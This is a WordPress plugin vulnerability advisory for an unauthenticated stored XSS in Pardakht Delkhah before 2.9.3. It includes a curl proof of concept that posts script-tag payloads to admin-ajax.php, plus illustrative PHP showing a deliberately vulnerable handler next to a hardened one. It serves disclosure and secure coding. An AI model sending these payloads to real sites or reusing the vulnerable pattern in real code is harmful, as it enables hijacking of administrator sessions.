WordPress Plugin Vulnerabilities

Pardakht Delkhah < 2.9.3 - Unauthenticated Stored XSS

Description

The plugin does not sanitise and escape some request parameters, allowing unauthenticated attackers to send a request containing XSS payloads. The stored payloads are triggered when a high-privilege user, such as an admin, visits a page belonging to the plugin.

Proof of Concept

1. Install and activate WooCommerce (dependency, no configuration required)

2. Install the vulnerable plugin (pardakht-delkhah 2.9.2)

3. Under plugin's menu, "Custom payment" > "Gateway Settings", hit the save button to set the default gateway.

4. Invoke the following curl request to store two XSS payloads (both of which will trigger an alert box):

curl http://localhost:10008/wp-admin/admin-ajax.php \
    --data 'action=cupri_action&cupri_fmobile=981111111111&cupri_fprice="><script>alert(`xss1`)</script>&cupri_f0="><script>alert(`xss2`)</script>'

5. The XSS will be triggered when an admin navigates to the plugin's menu (/wp-admin/edit.php?post_type=cupri_pay)
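To show the bug class the description and PoC point at (request parameters stored without sanitisation and printed on an admin screen without escaping), here is a hypothetical reconstruction in PHP. It is an added illustration, not the plugin's real code: the handler, meta key and column names are assumed; only the `cupri_action` action and the `cupri_fmobile` / `cupri_fprice` parameter names come from the advisory.

```php
<?php
// Hypothetical reconstruction (not the plugin's actual code) of the pattern
// behind an unauthenticated stored XSS: an admin-ajax handler reachable by
// anonymous users stores request parameters verbatim, and an admin list
// column later echoes them back unescaped.

// --- Vulnerable pattern: no sanitisation on input, no escaping on output ---
function cupri_action_vulnerable() {
    $post_id = wp_insert_post( array(
        'post_type'   => 'cupri_pay',        // post type from the advisory's admin URL
        'post_status' => 'publish',
        'post_title'  => 'payment',
    ) );
    // Stored exactly as received: "><script>...</script> ends up in the database.
    update_post_meta( $post_id, 'cupri_fmobile', $_POST['cupri_fmobile'] );
    update_post_meta( $post_id, 'cupri_fprice',  $_POST['cupri_fprice'] );
    wp_die();
}
add_action( 'wp_ajax_nopriv_cupri_action', 'cupri_action_vulnerable' );

function cupri_admin_column_vulnerable( $column, $post_id ) {
    // Raw echo into the admin page: the stored payload runs in the admin's browser.
    echo get_post_meta( $post_id, 'cupri_fprice', true );
}

// --- Hardened pattern: validate and sanitise on input, escape on output ---
function cupri_action_hardened() {
    $mobile = sanitize_text_field( wp_unslash( $_POST['cupri_fmobile'] ?? '' ) );
    $price  = sanitize_text_field( wp_unslash( $_POST['cupri_fprice'] ?? '' ) );
    // Both fields have a narrow expected shape; reject anything else outright.
    if ( ! preg_match( '/^\d{6,15}$/', $mobile ) || ! is_numeric( $price ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }
    $post_id = wp_insert_post( array(
        'post_type'   => 'cupri_pay',
        'post_status' => 'publish',
        'post_title'  => 'payment',
    ) );
    update_post_meta( $post_id, 'cupri_fmobile', $mobile );
    update_post_meta( $post_id, 'cupri_fprice',  $price );
    wp_send_json_success();
}

function cupri_admin_column_hardened( $column, $post_id ) {
    // Escape at the point of output regardless of what input validation did;
    // a later code path may write this meta key without going through it.
    echo esc_html( get_post_meta( $post_id, 'cupri_fprice', true ) );
}
add_action( 'manage_cupri_pay_posts_custom_column', 'cupri_admin_column_hardened', 10, 2 );
```

Only one of the two `add_action` pairs would be registered in a real plugin; both are shown here so the vulnerable and hardened handlers can be read side by side.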

Affects Plugins

Fixed in 2.9.3

Classification

Type
XSS

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Verified
Yes

Timeline

Publicly Published
2022-12-27
Added
2022-12-27
Last Updated
2022-12-27